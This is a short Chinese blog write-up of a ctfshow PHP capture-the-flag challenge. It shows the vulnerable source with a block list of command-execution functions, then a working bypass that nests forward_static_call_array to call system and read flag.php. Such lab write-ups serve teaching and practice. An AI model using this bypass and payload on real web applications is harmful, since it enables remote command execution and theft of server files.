M0deration's blog.

ctfshow红包题

wp
字数统计: 313阅读时长: 1 min
2020/12/01 Share

耗子尾汁

今晚晚上学弟丢过来一个题,说试了半天⑧行

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
error_reporting(0); 
highlight_file(__FILE__); 
$a = $_GET['a']; 
$b = $_GET['b']; 
function CTFSHOW_36_D($a,$b){ 
    $dis = array("var_dump","exec","readfile","highlight_file","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents","");
    $a = strtolower($a); 
    if (!in_array($a,$dis,true)) { 
        forward_static_call_array($a,$b); 
    }else{ 
        echo 'hacker'; 
    } 
} 
CTFSHOW_36_D($a,$b); 
echo "rlezphp!!!";

forward_static_call_array这是一个回调函数,这里可以执行的函数,而且没有被过滤,这里就直接想到套娃呀,b传的参数全都没有过滤,我直接让a=forward_static_call_array然后在b中对嵌套在里面的forward_static_call_array回调函数传参就可以了

本地试的的poc

1
2
3
4
5
6
$c=array("whoami");
$a=array('system',$c);
var_dump($a);
//$b=array($a);
//var_dump($b);
forward_static_call_array(forward_static_call_array,$a);

exp

1
?a=forward_static_call_array&b[]=system&b[][]=cat flag.php|base64

204853-445105

base64解一下就可以了

CATALOG
  1. 1. 耗子尾汁
Total : 12
2022
2021
2020
wp network others
Web javasec others